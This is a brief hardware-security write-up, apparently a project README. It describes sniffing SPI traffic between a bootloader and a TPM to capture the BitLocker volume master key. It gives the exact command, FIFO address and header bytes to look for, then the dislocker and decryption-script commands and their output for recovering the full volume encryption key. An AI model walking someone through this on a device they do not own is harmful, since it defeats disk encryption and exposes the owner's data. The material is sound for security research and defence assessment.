TPM KEY SNIFFING. Bootloader and TPM Communicate use different protocols such as lpc, spi, I2C. Let's see how it works when communication takes place via SPI protocol.
This project was ispired by : https://pulsesecurity.co.nz/articles/TPM-sniffing. Thanks!
The SPI protocol is based on 4 signals, SPI CLK, SPI MISO, SPI MOSI and SPI CS. Data go in and out using MISO and MOSI and the slave is selected by pulling down the signal SPI CS.
SPI CS <--------> SPI CS
SPI MOSI ---------> SPI MOSI
SPI MISO <--------- SPI MISO
SPI CLK <--------> SPI CLK
So the commnication between the bootloader and TPM uses 4 lines. What we have to do it is just sniffing the traffic that takes place on these data lines.
First of all, we have to identify the TPM installed on the main board, in my case:
Pretty small. :)
And so even if you don't know the specific TPM in front of you just remember that the pinout is a standard.
https://trustedcomputinggroup.org/wp-content/uploads/PC-Client-Specific-Platform-TPM-Profile-for-TPM-2p0-vp04p34_pubrev.pdf .
Then solder some wire to the relative pins and start sniffing using a Logical Analyzer with a frequency of at least 4 times in order to recostruct the original signal.
The command used by the bootloader to read back the VMK is "80h" from the address "0024h" TPM_DATA_FIFO_0, What we need to do to get the key is to look at this specific command and address.
Start from the VMK header “2C 00 00 00 01 00 00 00 03 20 00 00" and write down 32 bytes.
Read 32 bytes and you will get the key.
Now you are ready to decrypt the harddisk.
Mount it and run: sudo dislocker-metadata -V /dev/sda2 > dislocker-metadata.txt
then:
python bitlocker_fvek_decrypt.py -f dislocker-metadata.txt -k vmk.bin where vmk.bin is the key extracted from the bus.
$ python bitlocker_fvek_decrypt.py -f dislocker-metadata.txt -k vmk.bin
https://github.com/SySS-Research/icestick-lpc-tpm-sniffer/blob/master/README.md
BitLocker FVEK Decrypt v0.2 by Matthias Deeg - SySS GmbH
[+] Extracted nonce:
409b87a369dbd501d9010000
[+] Extracted MAC:
12c7b1c759e76ad88c3efd451a0fc945
[+] Extracted payload:
fd82fcf27ded951a2327e2e9d00b9ba0a3245f949bc53163bcc26088531215d17be6f99794d3fcfeb22bb41e
[+] Decrypted Full Volume Encryption Key (FVEK):
561bd26ca61fa3fb3445994b0f62649ce86e90085c0ff25dda57be61c2667cb6
[+] Created FVEK file 'fvek.bin' for use with dislocker
Now you can decrypt the full harddisk with the FVEK.
@giggi0x00